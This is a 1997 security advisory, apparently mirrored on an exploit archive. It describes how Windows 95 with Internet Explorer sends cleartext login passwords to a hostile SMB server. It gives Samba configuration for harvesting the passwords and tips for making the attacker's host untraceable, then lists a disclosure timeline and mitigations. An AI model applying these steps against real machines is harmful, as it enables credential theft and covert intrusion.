Win95 Cleartext SMB authentication hole

Summary
Description:Win95 is that it will connect to SMB servers and try the user's plaintext password first. You can also direct this through a web page with a linke like file://\\server/hackmicrosoft/sploit.gif. You also have to inform it of your name (can be done through SAMBA's nmbd utility).
Author:Steve Birnbaum (sbirn@security.org.il)
Compromise:Grab Win95 Passwords (remote)
Vulnerable Systems:Win95, Internet Explorer to a slight degree
Date:25 March 1997
Details

Exploit:
[This is from  http://www.security.org.il/msnetbreak/index.html Go there for working links.  --Fyodor]

What's new

It is possible from anywhere on the Internet to obtain the cleartext Windows 95 login password
from a Windows 95 computer on a network connected directly to the Internet given only the IP
address and the workgroup and leave no trace of your actions. It is untested and may work with
Windows For Workgroups as well. 

A demonstration is now available. 

Description

There has been recent discussion on security mailing lists concerning the fact that Microsoft
Internet Explorer running on Windows NT will automatically try to log in to a remote SMB server
(file server) without prompting the user or without the user's knowledge. By design, the NT
machine will transmit to this remote server the encrypted password and username of the user.
This is documented by Aaron Spangler. The caveats with this are that the passwords are
encrypted and that in many cases people do not use WWW browsers from NT servers, but rather
from computers running Windows 95. 

It has been explained that this same exploit does not work against Windows 95 because Windows
95 is only capable of accessing SMB shares (file sharing) if they are: 

     Connected to the same subnet. 
     In the Windows 95 computer's LMHOSTS file on startup 
     Announced to the Windows 95 computer by a Master Browser 

It is this third and final condition that can be taken advantage of to obtain the cleartext password
and username of any Windows 95 user who uses Microsoft Internet Explorer. Even careless use
of Microsoft Network Neighborhood can exploit this hole without the requirement for Internet
Explorer The requirements are knowledge of the user's IP address, workgroup name and that
they access a hostile web page. The first two are not difficult to obtain and the third does not have
to be an obscure page. In the last 6 months sites such as the CIA have been broken into. All it
would require is that one un-noticeable line be added to the home page. Since the viewable
content of the page has not been altered, such a change can go unnoticed for a long time. 

The Exploit

This involves the use of the Unix SMB implementation called Samba. There are no source
changes required, but it should be compiled with -DDEBUG_PASSWORD.
Samba has an option in the smb.cfg file called remote announce. This allows you to specify a
network address (host or broadcast) and workgroup name to inform about your existence. I have
configured the [global] section of the smb.conf file like this: 

   workgroup = EXPLOIT
   preferred master = yes
   domain master = yes
   security = user
   debug level = 100
   remote announce = 10.0.0.255/WORKGROUP
      

The only thing that must be changed is the remote announce line. The rest works as-is. A simple
share must then be set up such as: 

[exploit]
   path = /tmp
   public = no
   browsable = yes
      

Nothing needs to be in the directory as nobody will ever see it. For the sake of untractability,
change your hostname to something that does not exist, but ensure to create an entry for it in
/etc/hosts. This makes your host untraceable unless the network you are connecting to
monitors network traffic. 

Run smbd. If you are running it from inetd, the process must at least start itself in order to send the
broadcast. Using smbclient to browse yourself is enough for this. The broadcast gets sent
regardless of what smbd was started for. 

At this point if anyone on the target network were to look at their Windows 95 Network
Neighborhood they would see the host "EXPLOIT". The host is now vulnerable to your attack.
While this step may seem a bit obscure and complicated, the truth is that it is very simple. I won't
get into details here, but the methods for obtaining the workgroup name are easy to use and
readily available. Finding a target network that has not protected ports 137 and 139 is also not so
hard. Once you've done that, setting everything up to here takes a very short ammount of time. 

The final and easiest step is to include the following in any html file a user on this network
accesses:
 

Congratulations!!! You will now see in your Samba log a line such as this:
checking user=[user] pass=[INNOCENT] 

What does this all mean?

The password of any Internet-connected user running Microsoft Internet Explorer on Windows
95 obtained be found in cleartext provided that their network administrator has not protected
them from accessing external SMB servers by closing ports 139 and 137. If you have obtained the
password of a user of a Windows NT server, you can now take the username, password and
workgroup and log into that Windows NT server. Your true hostname and IP address are not
stored in the html file and I am aware of no logging of hosts that enter the browse list. This means
that you are not traceable, even though they are connecting to your machine. If you are lucky, you
found the Windows 95 machine of the NT administrator and have little work left in order to access
the NT server with administrator privileges. 

Solutions

     Use Netscape
     It appears that Netscape does not have access to the cleartext password or does not try to
     send it as does MSIE. 
     Use a proxy firewall or packet filter to close off ports 137 and 139 from external access to
     your network, though this still leaves you at risk from internal attacks. 
     Ask Microsoft to rewrite Windows to not send passwords by default. 

Demonstration

The demonstration is now available. In order to view the demonstration you should be using a
Windows 95 computer to which we are able to connect to ports 137-139. If you are behind a
firewall or other security device, then this will not work. 

When you are ready, proceed to the demonstration. 

Responses / Updates

     March 17, 20:00: Microsoft Israel was informed of the problem and requested further
     information. 
     March 17, 22:30: This document initially completed. 
     March 18, 00:30: Final tests with remote sites completed. 
     March 19, 10:00: Microsoft contacted us and requested a detailed explanation of the
     problem. 
     March 19, 21:00: This is confirmed to affect dialup users of Windows 95 as long as file
     sharing is turned on. 
     March 20, 01:10: Demonstration made available on the web. 
     March 20, 20:00: We are contacted for the first time by Microsoft USA. 
     March 24: Microsoft acknowledge the problem on their web site, but downplays the actual
     risk. 
     March 28: The New York Times wrote an article about the security holes in Microsoft's
     products. 
     April 4: AFCERT (United States Air Force CERT) released a security advisory titled
     Windows NT and Windows 95 Password Vulnerability. 
     April 13: MSIE 4.0 pre-release obtained from Microsoft's public web site is tested and
     found to be vulnerable to the exploit. 

Related Pages

     Exploiting SMB authentication on NT to obtain encrypted passwords - Discovered by
     Aaron Spangler 
     Exploiting NTLM authentication on NT to obtain passwords over the web - Discovered
     by Paul Ashton 
     News Articles 

Credits

Discovery by Steve Birnbaum with help from Mark Gazit.
Additional support from Yacov Drori and Roman Lasker.

Thanks also to hobbit for his paper on CIFS, BioH for helping to test this, and anyone else who
helped or provided ideas. 

Disclaimer

The details of this exploit are being released with the interest of security in mind. No malice or
harm is intended towards any company or organization. We are not responsible for any actions
taken based on this information, harmful or otherwise. 


More Exploits!

The master index of all exploits is available here (Very large file)
Or you can pick your favorite operating system:
All OS's Linux Solaris/SunOS Micro$oft
*BSD Macintosh AIX IRIX
ULTRIX/Digital UNIX HP/UX SCO Remote exploits

This page is part of Fyodor's exploit world. For a free program to automate scanning your network for vulnerable hosts and services, check out my network mapping tool, nmap. Or try these Insecure.Org resouces:

[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]
AlienVault